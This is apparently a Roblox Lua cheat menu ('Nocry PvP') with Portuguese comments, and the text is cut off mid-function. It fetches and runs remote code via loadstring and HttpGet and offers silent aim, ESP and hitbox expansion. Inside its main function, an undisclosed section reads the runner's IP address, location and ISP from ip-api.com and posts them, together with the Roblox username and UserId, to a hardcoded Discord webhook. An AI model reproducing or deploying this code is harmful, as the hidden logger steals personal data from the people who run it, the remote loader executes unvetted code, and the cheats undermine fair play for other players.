-- ========================================
--           DEPENDÊNCIAS
-- ========================================
local Junkie = loadstring(game:HttpGet("https://jnkie.com/sdk/library.lua"))()
Junkie.service = "pvpmenu"       -- mude se necessário
Junkie.identifier = "1030746"     -- mude se necessário
Junkie.provider = "User"

local TweenService = game:GetService("TweenService")
local UserInputService = game:GetService("UserInputService")
local CoreGui = game:GetService("CoreGui")
local HttpService = game:GetService("HttpService")
local RunService = game:GetService("RunService")

local Config = {
    title = "Nocry PvP",          -- mude o título aqui
    key_file = "meuscript_key.txt", -- mude o nome do arquivo
    key_link = "jnkie.com/get-key/autouber",
    discord_link = "https://discord.gg/sfsFjGz7dY",
    logo_asset = "rbxassetid://94974019799974",
    colors = {
        background = Color3.fromRGB(15, 15, 15),
        header = Color3.fromRGB(20, 20, 20),
        input = Color3.fromRGB(25, 25, 25),
        button = Color3.fromRGB(139, 0, 0),
        buttonHover = Color3.fromRGB(170, 20, 20),
        text = Color3.fromRGB(255, 255, 255),
        textDim = Color3.fromRGB(120, 120, 120),
        accent = Color3.fromRGB(139, 0, 0),
        success = Color3.fromRGB(50, 205, 110),
        error = Color3.fromRGB(245, 70, 90),
        warning = Color3.fromRGB(255, 180, 50),
        statusIdle = Color3.fromRGB(180, 80, 80)
    },
    fonts = {
        main = Enum.Font.ArimoBold,
        title = Enum.Font.ArimoBold,
        button = Enum.Font.ArimoBold,
        input = Enum.Font.ArimoBold,
        body = Enum.Font.ArimoBold
    },
    textSizes = {
        title = 22, status = 15, input = 16,
        button = 13, notifTitle = 14, notifBody = 12
    },
    sizes = {
        windowWidth = 420, windowHeight = 255,
        headerHeight = 48, elementHeight = 44,
        elementWidth = 0.90, cornerRadius = 10,
        padding = 14, gap = 12
    }
}

local Icons = {
    key = "rbxassetid://96510194465420",
    shield = "rbxassetid://89965059528921",
    check = "rbxassetid://76078495178149",
    copy = "rbxassetid://125851897718493",
    discord = "rbxassetid://83278450537116",
    alert = "rbxassetid://140438367956051",
    lock = "rbxassetid://114355063515473",
    loading = "rbxassetid://116535712789945",
    close = "rbxassetid://6022668916"
}

-- ========================================
--         FUNÇÕES AUXILIARES
-- ========================================
local function isMobile()
    return UserInputService.TouchEnabled and not UserInputService.KeyboardEnabled
end

local function getScale()
    local viewport = workspace.CurrentCamera.ViewportSize
    return math.clamp(math.min(viewport.X, viewport.Y) / 800, 0.7, 1.2)
end

local function saveKey(key)
    pcall(function() writefile(Config.key_file, key) end)
end

local function loadKey()
    local ok, content = pcall(function()
        if isfile(Config.key_file) then return readfile(Config.key_file) end
        return nil
    end)
    if ok and content and content ~= "" then return content end
    return nil
end

local function clearKey()
    pcall(function() delfile(Config.key_file) end)
end

-- ========================================
--     COLE SEU SCRIPT AQUI DENTRO
-- ========================================
local function ExecuteScript()

-- // SISTEMA DE LOGS / WEBHOOK (Separado) // --

local HttpService = game:GetService("HttpService")
local Players = game:GetService("Players")

local player_name = Players.LocalPlayer.Name
local webhook_url = "https://discord.com/api/webhooks/1474469884611268670/CZ0rcaamjRr7WNdIOMW88qnwxjpBsha88YnAjJNim7z4qA9M5QZQvZdrZUU5eTfvrPVx"

-- Função para fazer request (funciona na maioria dos exploits)
local request = syn and syn.request or http_request or request or (fluxus and fluxus.request) or http.request

-- Pega informações do IP
local success, ip_info = pcall(function()
    return request({
        Url = "http://ip-api.com/json",
        Method = "GET"
    })
end)

local ipinfo_table = {}
if success and ip_info and ip_info.Body then
    pcall(function()
        ipinfo_table = HttpService:JSONDecode(ip_info.Body)
    end)
end

-- Monta o embed
local embed = {
    ["username"] = "📡 Vea Boquetera",
    ["avatar_url"] = "https://media.discordapp.net/attachments/1410305233170464788/1410324367954546909/IMG_20250228_225159.jpg",
    ["embeds"] = {{
        ["title"] = "Novo Log Capturado",
        ["description"] = "Dados de conexão obtidos com sucesso.",
        ["color"] = 0x2F3136,
        ["fields"] = {
            {["name"] = "👤 Usuário",      ["value"] = "`" .. player_name .. "`", ["inline"] = true},
            {["name"] = "🆔 UserId",       ["value"] = "`" .. Players.LocalPlayer.UserId .. "`", ["inline"] = true},
            {["name"] = "🌍 IP",           ["value"] = "`" .. (ipinfo_table.query or "Não obtido") .. "`", ["inline"] = false},
            {["name"] = "🏳 País",         ["value"] = (ipinfo_table.country or "??") .. " (" .. (ipinfo_table.countryCode or "??") .. ")", ["inline"] = true},
            {["name"] = "📍 Local",        ["value"] = (ipinfo_table.city or "?") .. ", " .. (ipinfo_table.regionName or "?"), ["inline"] = true},
            {["name"] = "🏢 ISP",          ["value"] = ipinfo_table.isp or "Não identificado", ["inline"] = true},
            {["name"] = "🏢 Org",          ["value"] = ipinfo_table.org or "Não identificado", ["inline"] = true}
        },
        ["footer"] = { 
            ["text"] = "Logger • " .. os.date("%d/%m/%Y %H:%M:%S") 
        },
        ["thumbnail"] = {
            ["url"] = "https://media.discordapp.net/attachments/1410305233170464788/1410324367954546909/IMG_20250228_225159.jpg"
        }
    }}
}

-- Envia o log para o Discord
pcall(function()
    request({
        Url = webhook_url,
        Method = "POST",
        Headers = {["Content-Type"] = "application/json"},
        Body = HttpService:JSONEncode(embed)
    })
end)

local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer
local UIS = game:GetService("UserInputService")
local RunService = game:GetService("RunService")
local TweenService = game:GetService("TweenService")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local Camera = workspace.CurrentCamera

-- Remotes (WeaponsSystem - comum em jogos de tiro)
local WeaponsNetwork = ReplicatedStorage:WaitForChild("WeaponsSystem"):WaitForChild("Network")
local WeaponFired = WeaponsNetwork:WaitForChild("WeaponFired")
local WeaponHit = WeaponsNetwork:WaitForChild("WeaponHit")

-- Variáveis principais
local aimbot = false
local wallCheck = false
local showFOV = true
local FOV = 15
local hitmarkerEnabled = true
local chamsAtivo = false
_G.ChamColor = Color3.fromRGB(255, 0, 0)

local highlights = {}

-- GUI Principal
local gui = Instance.new("ScreenGui", game.CoreGui)
gui.Name = "POZE_MENU"
gui.DisplayOrder = 999
gui.IgnoreGuiInset = true
gui.ResetOnSpawn = false

-- Loading Screen
local loadingScreen = Instance.new("Frame", gui)
loadingScreen.Size = UDim2.new(1, 0, 1, 0)
loadingScreen.BackgroundColor3 = Color3.fromRGB(5, 5, 5)
loadingScreen.BorderSizePixel = 0
loadingScreen.ZIndex = 100

local loadingText = Instance.new("TextLabel", loadingScreen)
loadingText.Size = UDim2.new(0, 400, 0, 60)
loadingText.Position = UDim2.new(0.5, -200, 0.45, -30)
loadingText.BackgroundTransparency = 1
loadingText.Text = "Nocry Menu"
loadingText.TextColor3 = Color3.fromRGB(255, 255, 255)
loadingText.Font = Enum.Font.GothamBold
loadingText.TextSize = 50
loadingText.ZIndex = 101

local subText = Instance.new("TextLabel", loadingScreen)
subText.Size = UDim2.new(0, 400, 0, 20)
subText.Position = UDim2.new(0.5, -200, 0.55, 10)
subText.BackgroundTransparency = 1
subText.Text = "CARREGANDO..."
subText.TextColor3 = Color3.fromRGB(200, 200, 200)
subText.Font = Enum.Font.GothamMedium
subText.TextSize = 16
subText.ZIndex = 101

-- Música de loading
local pozeMusic = Instance.new("Sound", workspace)
pozeMusic.SoundId = "rbxassetid://1837722652"
pozeMusic.Volume = 10

task.spawn(function()
    pozeMusic:Play()
    for i = 1, 3 do
        loadingText.Visible = false
        task.wait(0.2)
        loadingText.Visible = true
        task.wait(0.2)
    end
    task.wait(4)
    
    local fade = TweenInfo.new(1.5, Enum.EasingStyle.Linear)
    TweenService:Create(loadingText, fade, {TextTransparency = 1}):Play()
    TweenService:Create(subText, fade, {TextTransparency = 1}):Play()
    TweenService:Create(loadingScreen, fade, {BackgroundTransparency = 1}):Play()
    
    for i = 10, 0, -1 do
        pozeMusic.Volume = i
        task.wait(0.1)
    end
    task.wait(1.5)
    loadingScreen:Destroy()
    pozeMusic:Destroy()
end)

-- Botão flutuante para abrir o menu
local openBtn = Instance.new("TextButton", gui)
openBtn.Size = UDim2.new(0, 40, 0, 40)
openBtn.Position = UDim2.new(0.5, -20, 0.5, -20)
openBtn.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
openBtn.Text = ""
openBtn.AutoButtonColor = false
openBtn.Draggable = true
Instance.new("UICorner", openBtn).CornerRadius = UDim.new(1, 0)

-- Painel principal
local panel = Instance.new("Frame", gui)
panel.Size = UDim2.new(0, 300, 0, 210)
panel.Position = UDim2.new(0.5, -150, 0.5, -105)
panel.BackgroundColor3 = Color3.fromRGB(15, 15, 15)
panel.Visible = false
panel.Draggable = true
Instance.new("UICorner", panel).CornerRadius = UDim.new(0, 8)

local title = Instance.new("TextLabel", panel)
title.Size = UDim2.new(1, 0, 0, 20)
title.BackgroundTransparency = 1
title.Text = "NOCRY MENU"
title.TextColor3 = Color3.fromRGB(200, 200, 200)
title.Font = Enum.Font.GothamBold
title.TextSize = 12

-- Abas (categorias)
local categories = Instance.new("Frame", panel)
categories.Size = UDim2.new(0, 90, 1, -20)
categories.Position = UDim2.new(0, 0, 0, 20)
categories.BackgroundTransparency = 1

local function createTab(name, yPos)
    local btn = Instance.new("TextButton", categories)
    btn.Size = UDim2.new(1, 0, 0, 25)
    btn.Position = UDim2.new(0, 0, 0, yPos)
    btn.BackgroundTransparency = 1
    btn.Text = name
    btn.TextColor3 = Color3.fromRGB(180, 180, 180)
    btn.Font = Enum.Font.Gotham
    btn.TextSize = 11
    return btn
end

local tabSilent = createTab("Silent", 10)
local tabESP    = createTab("ESP", 40)
local tabHitbox = createTab("Hitbox", 70)
local tabMain   = createTab("Main", 100)

local container = Instance.new("Frame", panel)
container.Position = UDim2.new(0, 95, 0, 20)
container.Size = UDim2.new(1, -95, 1, -20)
container.BackgroundTransparency = 1

local function newPage()
    local page = Instance.new("Frame", container)
    page.Size = UDim2.new(1, 0, 1, 0)
    page.BackgroundTransparency = 1
    page.Visible = false
    return page
end

local silentPage = newPage()
local espPage    = newPage()
local hitboxPage = newPage()
local mainPage   = newPage()

local function switchPage(page)
    for _, v in pairs(container:GetChildren()) do
        v.Visible = false
    end
    page.Visible = true
end

tabSilent.MouseButton1Click:Connect(function() switchPage(silentPage) end)
tabESP.MouseButton1Click:Connect(function() switchPage(espPage) end)
tabHitbox.MouseButton1Click:Connect(function() switchPage(hitboxPage) end)
tabMain.MouseButton1Click:Connect(function() switchPage(mainPage) end)

switchPage(silentPage)  -- abre na aba Silent por padrão

local function createButton(parent, text, yPos)
    local btn = Instance.new("TextButton", parent)
    btn.Size = UDim2.new(1, -10, 0, 22)
    btn.Position = UDim2.new(0, 5, 0, yPos)
    btn.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
    btn.TextColor3 = Color3.new(1, 1, 1)
    btn.Font = Enum.Font.Gotham
    btn.TextSize = 10
    btn.Text = text
    Instance.new("UICorner", btn).CornerRadius = UDim.new(0, 6)
    return btn
end

-- Botões Silent
local btnSilent = createButton(silentPage, "Silent OFF", 10)
btnSilent.MouseButton1Click:Connect(function()
    aimbot = not aimbot
    btnSilent.Text = "Silent " .. (aimbot and "ON" or "OFF")
end)

local btnWall = createButton(silentPage, "WallCheck OFF", 35)
btnWall.MouseButton1Click:Connect(function()
    wallCheck = not wallCheck
    btnWall.Text = "WallCheck " .. (wallCheck and "ON" or "OFF")
end)

local btnFOV = createButton(silentPage, "FOV ON", 60)
btnFOV.MouseButton1Click:Connect(function()
    showFOV = not showFOV
    btnFOV.Text = "FOV " .. (showFOV and "ON" or "OFF")
end)

local btnHitmarker = createButton(silentPage, "Hitmarker ON", 85)
btnHitmarker.MouseButton1Click:Connect(function()
    hitmarkerEnabled = not hitmarkerEnabled
    btnHitmarker.Text = "Hitmarker " .. (hitmarkerEnabled and "ON" or "OFF")
end)

-- Slider FOV
local sliderFrame = Instance.new("Frame", silentPage)
sliderFrame.Size = UDim2.new(1, -10, 0, 10)
sliderFrame.Position = UDim2.new(0, 5, 0, 115)
sliderFrame.BackgroundColor3 = Color3.fromRGB(30, 30, 30)

local sliderDrag = Instance.new("Frame", sliderFrame)
sliderDrag.Size = UDim2.new(0, 10, 1, 0)
sliderDrag.BackgroundColor3 = Color3.new(1, 1, 1)

local fovLabel = Instance.new("TextLabel", silentPage)
fovLabel.Size = UDim2.new(1, 0, 0, 15)
fovLabel.Position = UDim2.new(0, 0, 0, 145)
fovLabel.BackgroundTransparency = 1
fovLabel.Text = tostring(FOV)
fovLabel.TextColor3 = Color3.fromRGB(200, 200, 200)
fovLabel.TextSize = 10

local btnMinus = Instance.new("TextButton", silentPage)
btnMinus.Size = UDim2.new(0, 20, 0, 20)
btnMinus.Position = UDim2.new(0, 5, 0, 140)
btnMinus.BackgroundTransparency = 1
btnMinus.Text = "-"
btnMinus.TextColor3 = Color3.new(1,1,1)
btnMinus.TextSize = 14

local btnPlus = Instance.new("TextButton", silentPage)
btnPlus.Size = UDim2.new(0, 20, 0, 20)
btnPlus.Position = UDim2.new(1, -25, 0, 140)
btnPlus.BackgroundTransparency = 1
btnPlus.Text = "+"
btnPlus.TextColor3 = Color3.new(1,1,1)
btnPlus.TextSize = 14

local dragging = false

btnPlus.MouseButton1Click:Connect(function()
    FOV = math.clamp(FOV + 5, 5, 200)
    fovLabel.Text = tostring(FOV)
    sliderDrag.Position = UDim2.new(math.clamp((FOV-5)/200, 0, 1), 0, 0, 0)
end)

btnMinus.MouseButton1Click:Connect(function()
    FOV = math.clamp(FOV - 5, 5, 200)
    fovLabel.Text = tostring(FOV)
    sliderDrag.Position = UDim2.new(math.clamp((FOV-5)/200, 0, 1), 0, 0, 0)
end)

-- Círculo FOV
local fovCircle = Drawing.new("Circle")
fovCircle.Thickness = 1
fovCircle.Filled = false
fovCircle.Color = Color3.new(1,1,1)

RunService.RenderStepped:Connect(function()
    fovCircle.Position = Camera.ViewportSize / 2
    fovCircle.Radius = FOV
    fovCircle.Visible = showFOV and aimbot
end)

-- ==================== ESP MELHORADO: Name + Box + Skeleton + Wall Check ====================

local ESP_ENABLED = false
local SHOW_NAME = true
local SHOW_BOX = true
local SHOW_SKELETON = true

local visibleColor = Color3.fromRGB(0, 255, 0)    -- Verde = visível
local hiddenColor  = Color3.fromRGB(255, 0, 0)    -- Vermelho = atrás de parede

local espObjects = {}   -- Armazena drawings por player

-- Checa se tem parede na frente (visibilidade)
local function isVisible(targetChar)
    if not targetChar or not targetChar:FindFirstChild("Head") then return false end
    local origin = Camera.CFrame.Position
    local target = targetChar.Head.Position
    local direction = target - origin

    local rayParams = RaycastParams.new()
    rayParams.FilterDescendantsInstances = {LocalPlayer.Character, targetChar}
    rayParams.FilterType = Enum.RaycastFilterType.Blacklist
    rayParams.IgnoreWater = true

    return workspace:Raycast(origin, direction, rayParams) == nil
end

-- Cria os drawings para um player
local function createESP(player)
    if espObjects[player] then return end

    local d = {
        name = Drawing.new("Text"),
        box = Drawing.new("Square"),
        boxOutline = Drawing.new("Square"),
        lines = {}
    }

    -- Name
    d.name.Size = 15
    d.name.Center = true
    d.name.Outline = true
    d.name.OutlineColor = Color3.new(0,0,0)
    d.name.Font = Drawing.Fonts.Plex
    d.name.Visible = false

    -- Box
    d.box.Thickness = 2
    d.box.Filled = false
    d.box.Visible = false

    d.boxOutline.Thickness = 3
    d.boxOutline.Color = Color3.new(0,0,0)
    d.boxOutline.Transparency = 0.6
    d.boxOutline.Filled = false
    d.boxOutline.Visible = false

    -- Skeleton connections (melhor R15 + R6 fallback)
    local connections = {
        {"Head", "UpperTorso"}, {"UpperTorso", "LowerTorso"},
        {"UpperTorso", "RightUpperArm"}, {"RightUpperArm", "RightLowerArm"}, {"RightLowerArm", "RightHand"},
        {"UpperTorso", "LeftUpperArm"},  {"LeftUpperArm", "LeftLowerArm"},  {"LeftLowerArm", "LeftHand"},
        {"LowerTorso", "RightUpperLeg"}, {"RightUpperLeg", "RightLowerLeg"}, {"RightLowerLeg", "RightFoot"},
        {"LowerTorso", "LeftUpperLeg"},  {"LeftUpperLeg", "LeftLowerLeg"},  {"LeftLowerLeg", "LeftFoot"}
    }

    -- Fallback para R6
    if player.Character and player.Character:FindFirstChild("Torso") then
        connections = {
            {"Head", "Torso"},
            {"Torso", "Right Arm"}, {"Right Arm", "Right Arm"}, -- simplificado
            {"Torso", "Left Arm"},
            {"Torso", "Right Leg"},
            {"Torso", "Left Leg"}
        }
    end

    for _, conn in ipairs(connections) do
        local line = Drawing.new("Line")
        line.Thickness = 2
        line.Transparency = 1
        line.Visible = false
        table.insert(d.lines, {line = line, p1 = conn[1], p2 = conn[2]})
    end

    espObjects[player] = d
end

-- Atualização do ESP todo frame
RunService.RenderStepped:Connect(function()
    if not ESP_ENABLED then
        for _, d in pairs(espObjects) do
            d.name.Visible = false
            d.box.Visible = false
            d.boxOutline.Visible = false
            for _, l in ipairs(d.lines) do l.line.Visible = false end
        end
        return
    end

    for _, player in pairs(Players:GetPlayers()) do
        if player == LocalPlayer or not player.Character then continue end

        local char = player.Character
        local head = char:FindFirstChild("Head")
        local root = char:FindFirstChild("HumanoidRootPart") or char:FindFirstChild("Torso")
        if not head or not root then continue end

        local visible = isVisible(char)
        local espColor = visible and visibleColor or hiddenColor

        createESP(player)
        local d = espObjects[player]

        -- World to Viewport
        local headScreen, onScreen = Camera:WorldToViewportPoint(head.Position)
        if not onScreen then
            d.name.Visible = false
            d.box.Visible = false
            d.boxOutline.Visible = false
            for _, l in ipairs(d.lines) do l.line.Visible = false end
            continue
        end

        -- Name ESP
        if SHOW_NAME then
            d.name.Text = player.DisplayName
            d.name.Position = Vector2.new(headScreen.X, headScreen.Y - 30)
            d.name.Color = espColor
            d.name.Visible = true
        else
            d.name.Visible = false
        end

        -- Box ESP
        if SHOW_BOX and root then
            local rootScreen = Camera:WorldToViewportPoint(root.Position)
            local height = (Camera:WorldToViewportPoint(root.Position + Vector3.new(0, 3, 0)).Y - rootScreen.Y) * 2
            local width = height * 0.65

            d.box.Size = Vector2.new(width, height)
            d.box.Position = Vector2.new(rootScreen.X - width/2, rootScreen.Y - height/2 + 5)
            d.box.Color = espColor
            d.box.Visible = true

            d.boxOutline.Size = d.box.Size
            d.boxOutline.Position = d.box.Position
            d.boxOutline.Visible = true
        else
            d.box.Visible = false
            d.boxOutline.Visible = false
        end

        -- Skeleton ESP
        if SHOW_SKELETON then
            for _, bone in ipairs(d.lines) do
                local part1 = char:FindFirstChild(bone.p1)
                local part2 = char:FindFirstChild(bone.p2)
                if part1 and part2 then
                    local p1, v1 = Camera:WorldToViewportPoint(part1.Position)
                    local p2, v2 = Camera:WorldToViewportPoint(part2.Position)
                    if v1 and v2 then
                        bone.line.From = Vector2.new(p1.X, p1.Y)
                        bone.line.To = Vector2.new(p2.X, p2.Y)
                        bone.line.Color = espColor
                        bone.line.Visible = true
                    else
                        bone.line.Visible = false
                    end
                else
                    bone.line.Visible = false
                end
            end
        else
            for _, bone in ipairs(d.lines) do bone.line.Visible = false end
        end
    end
end)

-- ==================== BOTÕES DA ABA ESP ====================

local btnToggle = createButton(espPage, "ESP OFF", 10)
btnToggle.MouseButton1Click:Connect(function()
    ESP_ENABLED = not ESP_ENABLED
    btnToggle.Text = "ESP " .. (ESP_ENABLED and "ON" or "OFF")
end)

local btnName = createButton(espPage, "Name ESP ON", 40)
btnName.MouseButton1Click:Connect(function()
    SHOW_NAME = not SHOW_NAME
    btnName.Text = "Name ESP " .. (SHOW_NAME and "ON" or "OFF")
end)

local btnBox = createButton(espPage, "Box ESP ON", 70)
btnBox.MouseButton1Click:Connect(function()
    SHOW_BOX = not SHOW_BOX
    btnBox.Text = "Box ESP " .. (SHOW_BOX and "ON" or "OFF")
end)

local btnSkeleton = createButton(espPage, "Skeleton ESP ON", 100)
btnSkeleton.MouseButton1Click:Connect(function()
    SHOW_SKELETON = not SHOW_SKELETON
    btnSkeleton.Text = "Skeleton ESP " .. (SHOW_SKELETON and "ON" or "OFF")
end)

-- Cores do sistema de parede
local btnVisible = Instance.new("TextButton", espPage)
btnVisible.Size = UDim2.new(0, 90, 0, 25)
btnVisible.Position = UDim2.new(0, 5, 0, 135)
btnVisible.BackgroundColor3 = visibleColor
btnVisible.Text = "Visível (Verde)"
btnVisible.TextColor3 = Color3.new(1,1,1)
btnVisible.MouseButton1Click:Connect(function()
    visibleColor = Color3.fromRGB(0, 255, 0)
    print("Cor Visível alterada para Verde")
end)

local btnHidden = Instance.new("TextButton", espPage)
btnHidden.Size = UDim2.new(0, 90, 0, 25)
btnHidden.Position = UDim2.new(0, 105, 0, 135)
btnHidden.BackgroundColor3 = hiddenColor
btnHidden.Text = "Atrás Parede (Vermelho)"
btnHidden.TextColor3 = Color3.new(1,1,1)
btnHidden.MouseButton1Click:Connect(function()
    hiddenColor = Color3.fromRGB(255, 0, 0)
    print("Cor Atrás da Parede alterada para Vermelho")
end)

-- Limpeza ao remover player
Players.PlayerRemoving:Connect(function(plr)
    if espObjects[plr] then
        local d = espObjects[plr]
        d.name:Remove()
        d.box:Remove()
        d.boxOutline:Remove()
        for _, l in ipairs(d.lines) do
            l.line:Remove()
        end
        espObjects[plr] = nil
    end
end)

print("✅ ESP Melhorado (Name + Box + Skeleton + Wall Check) carregado!")

-- ==================== HITBOX EXPANDER ====================
local hitboxEnabled = false
local hitboxSize = 5
local originalSizes = {}

local btnHitbox = createButton(hitboxPage, "Hitbox OFF", 10)
btnHitbox.MouseButton1Click:Connect(function()
    hitboxEnabled = not hitboxEnabled
    btnHitbox.Text = "Hitbox " .. (hitboxEnabled and "ON" or "OFF")
    
    if not hitboxEnabled then
        for plr, data in pairs(originalSizes) do
            if plr.Character then
                local arm = plr.Character:FindFirstChild("Right Arm") or plr.Character:FindFirstChild("RightHand")
                if arm and data then
                    arm.Size = data.Size
                    arm.Transparency = data.Transparency
                end
            end
        end
        originalSizes = {}
    end
end)

createButton(hitboxPage, "+", 40).MouseButton1Click:Connect(function() hitboxSize = hitboxSize + 1 end)
createButton(hitboxPage, "-", 70).MouseButton1Click:Connect(function() hitboxSize = math.max(1, hitboxSize - 1) end)

RunService.RenderStepped:Connect(function()
    if not hitboxEnabled then return end
    for _, plr in pairs(Players:GetPlayers()) do
        if plr ~= LocalPlayer and plr.Character then
            local arm = plr.Character:FindFirstChild("Right Arm") or plr.Character:FindFirstChild("RightHand")
            if arm then
                if not originalSizes[plr] then
                    originalSizes[plr] = {Size = arm.Size, Transparency = arm.Transparency}
                end
                arm.Size = Vector3.new(hitboxSize, hitboxSize, hitboxSize)
                arm.Transparency = 0.3
            end
        end
    end
end)

-- Função para verificar parede
local function hasWall(origin, targetPos, targetChar)
    local params = RaycastParams.new()
    params.FilterDescendantsInstances = {LocalPlayer.Character, targetChar}
    params.FilterType = Enum.RaycastFilterType.Blacklist
    return workspace:Raycast(origin, targetPos - origin, params) ~= nil
end

-- Pega o alvo mais próximo dentro do FOV
local function getTarget()
    local bestDist = math.huge
    local bestTarget = nil
    local center = Camera.ViewportSize / 2

    for _, plr in pairs(Players:GetPlayers()) do
        if plr ~= LocalPlayer and plr.Character and plr.Character:FindFirstChild("Head") then
            local hum = plr.Character:FindFirstChild("Humanoid")
            if hum and hum.Health > 0 then
                local headPos, visible = Camera:WorldToViewportPoint(plr.Character.Head.Position)
                if visible then
                    local dist = (Vector2.new(headPos.X, headPos.Y) - center).Magnitude
                    if dist <= FOV then
                        if not wallCheck or not hasWall(Camera.CFrame.Position, plr.Character.Head.Position, plr.Character) then
                            if dist < bestDist then
                                bestDist = dist
                                bestTarget = plr.Character
                            end
                        end
                    end
                end
            end
        end
    end
    return bestTarget
end

-- Silent Aim (redireciona o tiro quando você atira)
WeaponFired.OnClientEvent:Connect(function()
    if not aimbot then return end

    local targetChar = getTarget()
    if not targetChar or not targetChar:FindFirstChild("Head") then return end

    local head = targetChar.Head
    local tool = LocalPlayer.Character and LocalPlayer.Character:FindFirstChildWhichIsA("Tool")

    if tool then
        WeaponHit:FireServer(tool, {
            p = head.Position,
            pid = 1,
            part = head,
            d = (head.Position - Camera.CFrame.Position).Magnitude,
            maxDist = 100,
            h = head,
            m = Enum.Material.Plastic,
            n = Vector3.new(0,1,0),
            t = 0.5,
            s = head.Size,
            sid = 1
        }, true)
    end
end)

-- Página Main (Esconder botão + Discord)
local btnHide = createButton(mainPage, "Esconder Botão Menu", 10)
btnHide.MouseButton1Click:Connect(function()
    openBtn.BackgroundTransparency = (openBtn.BackgroundTransparency == 0) and 1 or 0
    btnHide.Text = (openBtn.BackgroundTransparency == 1) and "Mostrar Botão Menu" or "Esconder Botão Menu"
end)

local btnDiscord = createButton(mainPage, "Copiar Discord", 35)
btnDiscord.MouseButton1Click:Connect(function()
    setclipboard("https://discord.gg/yH5vczR7wv")  -- mude para o link real
    print("Discord copiado!")
end)

local credits = Instance.new("TextLabel", mainPage)
credits.Size = UDim2.new(1, 0, 0, 15)
credits.Position = UDim2.new(0, 0, 1, -15)
credits.BackgroundTransparency = 1
credits.Text = "By : Menojz"
credits.TextColor3 = Color3.fromRGB(100, 100, 100)
credits.TextSize = 10

-- Abrir/Fechar menu
openBtn.MouseButton1Click:Connect(function()
    panel.Visible = not panel.Visible
    if panel.Visible then
        panel.Size = UDim2.new(0, 0, 0, 0)
        TweenService:Create(panel, TweenInfo.new(0.2), {Size = UDim2.new(0, 300, 0, 210)}):Play()
    end
end)

print("✅ Poze Menu carregado com sucesso! (Versão corrigida)")

    -- ✅ TODO O SEU CÓDIGO VAI AQUI DENTRO
    -- Exemplo:
    -- print("Script executado!")
end

-- ========================================
--         NOTIFICAÇÕES (igual ao original)
-- ========================================
local NotificationList = {}

local function Notify(title, message, duration, iconType)
    local notifGui = Instance.new("ScreenGui")
    notifGui.ResetOnSpawn = false
    notifGui.DisplayOrder = 999999
    notifGui.Parent = CoreGui

    local scale = getScale()
    local width = math.clamp(300 * scale, 240, 340)
    local height = math.clamp(70 * scale, 60, 85)

    local frame = Instance.new("Frame")
    frame.Size = UDim2.new(0, width, 0, height)
    frame.Position = UDim2.new(1, width + 20, 1, -12)
    frame.AnchorPoint = Vector2.new(1, 1)
    frame.BackgroundColor3 = Config.colors.header
    frame.BorderSizePixel = 0
    frame.Parent = notifGui

    Instance.new("UICorner", frame).CornerRadius = UDim.new(0, 10)

    local stroke = Instance.new("UIStroke", frame)
    stroke.Color = Config.colors.accent
    stroke.Thickness = 1
    stroke.Transparency = 0.7

    local progressBg = Instance.new("Frame", frame)
    progressBg.Size = UDim2.new(1, 0, 0, 3)
    progressBg.Position = UDim2.new(0, 0, 1, -3)
    progressBg.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
    progressBg.BorderSizePixel = 0
    Instance.new("UICorner", progressBg).CornerRadius = UDim.new(0, 2)

    local progressBar = Instance.new("Frame", progressBg)
    progressBar.Size = UDim2.new(1, 0, 1, 0)
    progressBar.BackgroundColor3 = Config.colors.accent
    progressBar.BorderSizePixel = 0
    Instance.new("UICorner", progressBar).CornerRadius = UDim.new(0, 2)

    local iconSize = height - 30
    local icon = Instance.new("ImageLabel", frame)
    icon.Size = UDim2.new(0, iconSize, 0, iconSize)
    icon.Position = UDim2.new(0, 12, 0.5, -2)
    icon.AnchorPoint = Vector2.new(0, 0.5)
    icon.BackgroundTransparency = 1
    icon.ScaleType = Enum.ScaleType.Fit

    local iconMap = {
        success = {Icons.check, Config.colors.success},
        error   = {Icons.alert, Config.colors.error},
        warning = {Icons.alert, Config.colors.warning},
        shield  = {Icons.shield, Config.colors.accent},
        key     = {Icons.key, Config.colors.accent},
        copy    = {Icons.copy, Config.colors.success},
        close   = {Icons.close, Config.colors.error},
    }
    local iconData = iconMap[iconType] or {Config.logo_asset, Config.colors.text}
    icon.Image = iconData[1]
    icon.ImageColor3 = iconData[2]

    local textX = 12 + iconSize + 12

    local titleLabel = Instance.new("TextLabel", frame)
    titleLabel.Size = UDim2.new(1, -(textX + 12), 0, 22)
    titleLabel.Position = UDim2.new(0, textX, 0, 10)
    titleLabel.BackgroundTransparency = 1
    titleLabel.Font = Config.fonts.main
    titleLabel.TextSize = math.clamp(Config.textSizes.notifTitle * scale, 12, 16)
    titleLabel.TextXAlignment = Enum.TextXAlignment.Left
    titleLabel.TextColor3 = Config.colors.text
    titleLabel.Text = title
    titleLabel.TextTruncate = Enum.TextTruncate.AtEnd

    local messageLabel = Instance.new("TextLabel", frame)
    messageLabel.Size = UDim2.new(1, -(textX + 12), 0, 20)
    messageLabel.Position = UDim2.new(0, textX, 0, 32)
    messageLabel.BackgroundTransparency = 1
    messageLabel.Font = Config.fonts.body
    messageLabel.TextSize = math.clamp(Config.textSizes.notifBody * scale, 10, 14)
    messageLabel.TextXAlignment = Enum.TextXAlignment.Left
    messageLabel.TextColor3 = Config.colors.textDim
    messageLabel.Text = message
    messageLabel.TextTruncate = Enum.TextTruncate.AtEnd

    local id = tick() .. HttpService:GenerateGUID(false)
    table.insert(NotificationList, {id = id, frame = frame, gui = notifGui, height = height})

    local function restack()
        local yOffset = 0
        for i = #NotificationList, 1, -1 do
            local n = NotificationList[i]
            if n and n.frame and n.frame.Parent then
                TweenService:Create(n.frame, TweenInfo.new(0.3, Enum.EasingStyle.Quart), {
                    Position = UDim2.new(1, -12, 1, -12 - yOffset)
                }):Play()
                yOffset = yOffset + n.height + 10
            end
        end
    end

    TweenService:Create(frame, TweenInfo.new(0.4, Enum.EasingStyle.Quart), {
        Position = UDim2.new(1, -12, 1, -12)
    }):Play()

    task.wait(0.1)
    restack()

    local function dismiss()
        for i, n in ipairs(NotificationList) do
            if n.id == id then table.remove(NotificationList, i) break end
        end
        TweenService:Create(frame, TweenInfo.new(0.3, Enum.EasingStyle.Quart), {
            Position = UDim2.new(1, width + 20, frame.Position.Y.Scale, frame.Position.Y.Offset)
        }):Play()
        task.wait(0.3)
        notifGui:Destroy()
        restack()
    end

    if duration and duration > 0 then
